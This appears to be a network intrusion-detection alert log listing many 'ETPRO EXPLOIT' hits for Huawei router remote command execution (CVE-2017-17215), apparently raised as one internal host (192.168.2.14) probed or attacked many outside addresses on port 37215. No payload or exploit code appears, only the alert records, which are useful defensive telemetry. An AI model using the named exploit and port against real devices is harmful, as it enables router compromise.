                                                    07/10/24-08:27:31.533375TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5211237215192.168.2.1441.112.246.154
                                                    07/10/24-08:26:34.190813TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4758037215192.168.2.1441.149.103.235
                                                    07/10/24-08:26:17.949635TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4638037215192.168.2.1441.115.101.254
                                                    07/10/24-08:26:23.335498TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4386637215192.168.2.14171.127.78.116
                                                    07/10/24-08:27:11.480663TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4291237215192.168.2.1427.197.252.57
                                                    07/10/24-08:27:13.942204TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5742437215192.168.2.1441.123.234.195
                                                    07/10/24-08:27:31.479200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3317837215192.168.2.14157.202.73.41
                                                    07/10/24-08:26:36.340754TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4117437215192.168.2.14197.199.114.37
                                                    07/10/24-08:26:36.373658TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5374037215192.168.2.14157.125.137.88
                                                    07/10/24-08:26:26.596367TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4971437215192.168.2.1464.88.236.39
                                                    07/10/24-08:26:57.644926TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3842237215192.168.2.14157.41.29.176
                                                    07/10/24-08:26:14.751683TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4121037215192.168.2.1441.91.129.72
                                                    07/10/24-08:26:38.624887TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4635037215192.168.2.1441.251.253.96
                                                    07/10/24-08:26:52.051203TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4912037215192.168.2.14106.65.150.96
                                                    07/10/24-08:26:34.242772TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3352837215192.168.2.1441.123.173.77
                                                    07/10/24-08:27:30.479166TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3376637215192.168.2.1441.214.169.67
                                                    07/10/24-08:26:28.777569TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3697837215192.168.2.14197.124.73.27
                                                    07/10/24-08:26:52.056548TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3497437215192.168.2.14197.184.91.241
                                                    07/10/24-08:27:13.750468TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4203037215192.168.2.1432.182.231.23
                                                    07/10/24-08:27:07.369832TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4732837215192.168.2.14157.75.52.135
                                                    07/10/24-08:27:19.230409TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5102237215192.168.2.14157.174.42.137
                                                    07/10/24-08:26:17.967479TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5275237215192.168.2.14197.93.235.10
                                                    07/10/24-08:26:18.006056TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3906837215192.168.2.1441.243.192.149
                                                    07/10/24-08:26:28.924774TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4023237215192.168.2.1441.127.211.90
                                                    07/10/24-08:26:41.318227TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4048237215192.168.2.14197.179.11.135
                                                    07/10/24-08:27:07.361237TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3277637215192.168.2.14157.135.105.212
                                                    07/10/24-08:27:19.230010TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4481437215192.168.2.1438.172.199.161
                                                    07/10/24-08:27:24.929002TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4873037215192.168.2.1441.191.17.245
                                                    07/10/24-08:27:34.122449TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3924837215192.168.2.1441.119.43.111
                                                    07/10/24-08:27:17.050369TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3854437215192.168.2.14157.135.112.123
                                                    07/10/24-08:27:24.913087TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3993237215192.168.2.14217.164.211.77
                                                    07/10/24-08:27:24.976996TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4421637215192.168.2.1485.144.33.115
                                                    07/10/24-08:27:32.569542TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5990237215192.168.2.14157.191.3.31
                                                    07/10/24-08:26:59.558711TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3288237215192.168.2.14206.29.39.141
                                                    07/10/24-08:27:17.083143TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4117037215192.168.2.14197.162.215.174
                                                    07/10/24-08:27:02.845496TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4775037215192.168.2.1441.114.37.65
                                                    07/10/24-08:27:32.608891TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4211437215192.168.2.14197.202.228.76
                                                    07/10/24-08:26:36.404948TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5348837215192.168.2.1447.152.54.157
                                                    07/10/24-08:26:11.614311TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3358837215192.168.2.14157.254.254.39
                                                    07/10/24-08:26:31.095696TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5001237215192.168.2.1441.233.176.159
                                                    07/10/24-08:26:26.602369TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5049237215192.168.2.1441.138.133.135
                                                    07/10/24-08:26:23.338726TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3676637215192.168.2.14197.171.142.67
                                                    07/10/24-08:26:36.362536TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5973837215192.168.2.1468.67.65.158
                                                    07/10/24-08:26:41.619076TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3631237215192.168.2.1441.109.73.68
                                                    07/10/24-08:26:36.372263TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3491437215192.168.2.14197.194.206.133
                                                    07/10/24-08:26:47.821658TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5030437215192.168.2.1441.210.180.13
                                                    07/10/24-08:27:02.898852TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5637437215192.168.2.14121.155.215.140
                                                    07/10/24-08:26:22.247004TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5414637215192.168.2.14177.193.104.254
                                                    07/10/24-08:27:33.881994TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3998037215192.168.2.14157.173.5.246
                                                    07/10/24-08:26:26.549983TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3814837215192.168.2.1441.29.115.217
                                                    07/10/24-08:27:08.423540TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5817237215192.168.2.14197.214.243.133
                                                    07/10/24-08:27:27.144985TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5069037215192.168.2.1441.48.81.59
                                                    07/10/24-08:27:11.546125TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3558837215192.168.2.14157.208.71.194
                                                    07/10/24-08:26:26.516253TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3539037215192.168.2.14157.102.1.210
                                                    07/10/24-08:26:17.937517TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4053437215192.168.2.14157.157.227.134
                                                    07/10/24-08:26:45.638729TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4481237215192.168.2.14197.136.93.249
                                                    07/10/24-08:26:23.297905TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4576637215192.168.2.1441.176.249.104
                                                    07/10/24-08:26:13.838798TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3510237215192.168.2.14116.159.204.163
                                                    07/10/24-08:27:32.597902TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4270237215192.168.2.14197.44.228.171
                                                    07/10/24-08:26:20.164918TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3421237215192.168.2.14157.71.124.5
                                                    07/10/24-08:26:51.939939TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5041837215192.168.2.14197.124.4.197
                                                    07/10/24-08:27:08.432094TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3283037215192.168.2.1417.118.48.120
                                                    07/10/24-08:27:28.149235TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5656437215192.168.2.14197.213.171.122
                                                    07/10/24-08:26:11.592193TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5990837215192.168.2.14157.166.157.182
                                                    07/10/24-08:26:14.812740TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5240237215192.168.2.14197.51.177.198
                                                    07/10/24-08:26:23.320744TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4129237215192.168.2.14157.6.27.16
                                                    07/10/24-08:26:20.134396TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5113437215192.168.2.1470.75.225.121
                                                    07/10/24-08:26:41.342760TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3966237215192.168.2.14197.159.167.165
                                                    07/10/24-08:26:53.181410TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5788437215192.168.2.1441.138.15.177
                                                    07/10/24-08:27:02.740584TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5776437215192.168.2.14157.69.68.21
                                                    07/10/24-08:27:22.839204TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4309437215192.168.2.14157.208.207.84
                                                    07/10/24-08:27:33.867801TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5274037215192.168.2.1441.216.244.86
                                                    07/10/24-08:27:02.833668TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3570637215192.168.2.1441.136.228.81
                                                    07/10/24-08:26:17.974758TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3602037215192.168.2.14165.231.120.204
                                                    07/10/24-08:26:33.151266TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4429037215192.168.2.14197.55.132.80
                                                    07/10/24-08:26:47.895563TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5340237215192.168.2.14197.119.229.146
                                                    07/10/24-08:26:34.207018TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4392637215192.168.2.14157.114.128.84
                                                    07/10/24-08:27:11.490604TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5731037215192.168.2.1441.96.24.245
                                                    07/10/24-08:26:15.838617TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3700237215192.168.2.14197.254.35.64
                                                    07/10/24-08:26:45.619051TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5025637215192.168.2.1460.179.33.202
                                                    07/10/24-08:27:33.863789TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4177437215192.168.2.1441.95.55.215
                                                    07/10/24-08:26:36.349242TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3499837215192.168.2.14197.212.103.188
                                                    07/10/24-08:26:59.765142TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3380837215192.168.2.1441.31.101.163
                                                    07/10/24-08:26:49.796978TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3303037215192.168.2.14157.152.211.43
                                                    07/10/24-08:27:21.440829TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5579637215192.168.2.14157.90.139.113
                                                    07/10/24-08:26:11.190243TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5271237215192.168.2.14115.183.79.252
                                                    07/10/24-08:26:52.069901TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3850837215192.168.2.1441.33.38.239
                                                    07/10/24-08:26:13.700547TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4141037215192.168.2.14121.184.217.108
                                                    07/10/24-08:27:14.822336TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6002437215192.168.2.1441.80.7.112
                                                    07/10/24-08:27:31.461924TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6026037215192.168.2.14191.184.102.33
                                                    07/10/24-08:27:33.915892TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3464837215192.168.2.14157.252.222.133
                                                    07/10/24-08:26:41.445058TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4810037215192.168.2.14157.245.225.72
                                                    07/10/24-08:27:10.621059TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3316437215192.168.2.14182.87.219.179
                                                    07/10/24-08:26:25.517538TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5380637215192.168.2.1441.61.62.184
                                                    07/10/24-08:26:42.463708TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3339637215192.168.2.1441.201.133.100
                                                    07/10/24-08:27:14.839655TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4291637215192.168.2.1441.17.202.139
                                                    07/10/24-08:27:02.908233TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5492237215192.168.2.14197.29.84.73
                                                    07/10/24-08:27:27.155945TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5211037215192.168.2.14157.48.138.184
                                                    07/10/24-08:27:22.835988TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5027837215192.168.2.14157.252.18.168
                                                    07/10/24-08:27:22.810322TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4290637215192.168.2.14197.35.5.141
                                                    07/10/24-08:27:34.117995TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6099837215192.168.2.14157.212.120.194
                                                    07/10/24-08:27:22.905348TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4076037215192.168.2.14197.54.210.1
                                                    07/10/24-08:27:23.920658TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4352037215192.168.2.14196.217.141.128
                                                    07/10/24-08:26:48.021815TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5136837215192.168.2.14157.183.103.243
                                                    07/10/24-08:26:31.084191TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4349437215192.168.2.14197.201.143.87
                                                    07/10/24-08:27:24.871233TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4374837215192.168.2.1441.168.158.147
                                                    07/10/24-08:27:27.138440TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5023037215192.168.2.1441.155.216.139
                                                    07/10/24-08:27:23.968110TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6070237215192.168.2.1444.28.66.64
                                                    07/10/24-08:26:31.081950TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5313637215192.168.2.1441.10.86.125
                                                    07/10/24-08:26:55.377944TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5406237215192.168.2.14157.248.163.112
                                                    07/10/24-08:27:19.224532TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5629237215192.168.2.14157.57.253.28
                                                    07/10/24-08:26:11.116364TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3599037215192.168.2.14197.215.53.253
                                                    07/10/24-08:26:55.365798TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3753237215192.168.2.14157.184.178.13
                                                    07/10/24-08:26:57.630985TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5445637215192.168.2.1441.46.114.215
                                                    07/10/24-08:26:45.689039TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4085837215192.168.2.14197.189.50.127
                                                    07/10/24-08:27:10.668583TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5848837215192.168.2.14157.109.48.161
                                                    07/10/24-08:26:28.761249TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3330237215192.168.2.14157.163.47.146
                                                    07/10/24-08:26:17.961786TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4644237215192.168.2.1473.53.184.10
                                                    07/10/24-08:26:26.585966TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6026237215192.168.2.1441.88.192.175
                                                    07/10/24-08:27:23.817367TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5505637215192.168.2.14132.178.99.232
                                                    07/10/24-08:26:26.589872TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5061437215192.168.2.14197.55.231.25
                                                    07/10/24-08:27:10.556595TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4825037215192.168.2.1441.219.117.101
                                                    07/10/24-08:26:28.716778TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4722237215192.168.2.14197.183.196.118
                                                    07/10/24-08:27:31.571103TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3784637215192.168.2.14197.243.194.11
                                                    07/10/24-08:26:59.861772TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4887037215192.168.2.1441.149.110.107
                                                    07/10/24-08:27:28.131981TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4378637215192.168.2.1431.11.86.149
                                                    07/10/24-08:27:22.445688TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4326437215192.168.2.14197.162.194.76
                                                    07/10/24-08:27:22.482500TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4067637215192.168.2.1478.235.11.83
                                                    07/10/24-08:27:22.564471TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5697237215192.168.2.1476.233.37.203
                                                    07/10/24-08:27:19.240664TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5550637215192.168.2.1441.219.38.206
                                                    07/10/24-08:26:14.626418TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3566237215192.168.2.1441.253.214.217
                                                    07/10/24-08:26:14.825440TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3519037215192.168.2.14197.43.10.29
                                                    07/10/24-08:26:14.775624TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4436437215192.168.2.1441.20.135.174
                                                    07/10/24-08:27:22.810322TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4693837215192.168.2.148.152.47.108
                                                    07/10/24-08:26:45.583346TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5195237215192.168.2.1441.117.82.130
                                                    07/10/24-08:27:02.714102TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5957637215192.168.2.1441.193.30.117
                                                    07/10/24-08:27:10.641712TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5618037215192.168.2.14157.236.33.64
                                                    07/10/24-08:27:22.548548TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5614237215192.168.2.1468.61.181.72
                                                    07/10/24-08:27:19.215943TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4807437215192.168.2.14197.195.28.55
                                                    07/10/24-08:27:05.127145TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4421237215192.168.2.14118.78.74.228
                                                    07/10/24-08:27:17.072702TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4579037215192.168.2.14157.50.42.47
                                                    07/10/24-08:26:22.214237TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3453237215192.168.2.14110.214.98.223
                                                    07/10/24-08:26:43.685142TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5696437215192.168.2.1488.225.218.83
                                                    07/10/24-08:26:44.495455TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3994637215192.168.2.14197.189.106.133
                                                    07/10/24-08:26:55.421947TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3904237215192.168.2.14157.139.55.68
                                                    07/10/24-08:27:19.170794TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5170637215192.168.2.1441.6.186.203
                                                    07/10/24-08:27:14.885642TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5471637215192.168.2.14197.231.2.1
                                                    07/10/24-08:26:59.879112TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4522037215192.168.2.1441.164.110.225
                                                    07/10/24-08:27:28.134313TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5436237215192.168.2.14157.130.48.224
                                                    07/10/24-08:26:33.263380TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3901037215192.168.2.14159.26.97.197
                                                    07/10/24-08:27:02.942646TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3967437215192.168.2.14197.181.210.61
                                                    07/10/24-08:26:34.192444TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4041037215192.168.2.1441.152.175.130
                                                    07/10/24-08:26:29.841830TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5652637215192.168.2.14157.8.229.188
                                                    07/10/24-08:26:31.095778TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3378237215192.168.2.14157.239.250.115
                                                    07/10/24-08:26:41.440883TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4991037215192.168.2.14157.122.159.56
                                                    07/10/24-08:26:14.807023TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3572837215192.168.2.14167.223.148.182
                                                    07/10/24-08:27:19.271475TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4615237215192.168.2.14165.118.26.103
                                                    07/10/24-08:27:20.501426TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3788637215192.168.2.14116.23.83.60
                                                    07/10/24-08:26:45.610191TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3523437215192.168.2.14157.35.14.27
                                                    07/10/24-08:26:45.616284TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5743837215192.168.2.14149.241.179.44
                                                    07/10/24-08:26:52.085060TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4640437215192.168.2.14171.107.144.227
                                                    07/10/24-08:26:38.616347TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4473637215192.168.2.14205.92.203.67
                                                    07/10/24-08:27:20.498164TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4556037215192.168.2.14157.225.225.36
                                                    07/10/24-08:26:41.360429TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3799237215192.168.2.14157.196.55.31
                                                    07/10/24-08:27:31.540964TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5724837215192.168.2.14197.57.53.181
                                                    07/10/24-08:26:42.466841TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3730637215192.168.2.1441.47.213.3
                                                    07/10/24-08:27:14.847892TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4669637215192.168.2.14157.58.250.194
                                                    07/10/24-08:26:33.206981TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4812437215192.168.2.14162.226.88.44
                                                    07/10/24-08:26:53.202675TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4077437215192.168.2.14197.89.141.13
                                                    07/10/24-08:26:34.243243TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4009637215192.168.2.14157.165.130.130
                                                    07/10/24-08:26:41.512805TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5131437215192.168.2.14197.113.218.23
                                                    07/10/24-08:27:14.856621TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4001437215192.168.2.14157.95.157.152
                                                    07/10/24-08:26:13.807864TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4182037215192.168.2.14157.37.35.0
                                                    07/10/24-08:27:24.867302TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5880837215192.168.2.1441.33.165.234
                                                    07/10/24-08:26:17.949635TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4595437215192.168.2.14197.59.253.121
                                                    07/10/24-08:26:52.054168TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4424637215192.168.2.14121.8.184.166
                                                    07/10/24-08:26:38.642305TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4664637215192.168.2.14116.93.102.4
                                                    07/10/24-08:26:45.643057TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5620837215192.168.2.1441.23.101.150
                                                    07/10/24-08:26:33.244914TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5360237215192.168.2.14157.167.68.153
                                                    07/10/24-08:27:22.909297TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4173837215192.168.2.1441.247.206.94
                                                    07/10/24-08:26:52.029785TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3615837215192.168.2.1460.132.123.32
                                                    07/10/24-08:26:13.780678TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4293437215192.168.2.14197.175.14.150
                                                    07/10/24-08:26:33.177763TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3720037215192.168.2.1419.107.147.149
                                                    07/10/24-08:27:27.029781TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3919037215192.168.2.14197.244.92.224
                                                    07/10/24-08:26:28.923936TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4014437215192.168.2.1441.57.229.57
                                                    07/10/24-08:27:11.612567TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3807437215192.168.2.14146.202.215.132
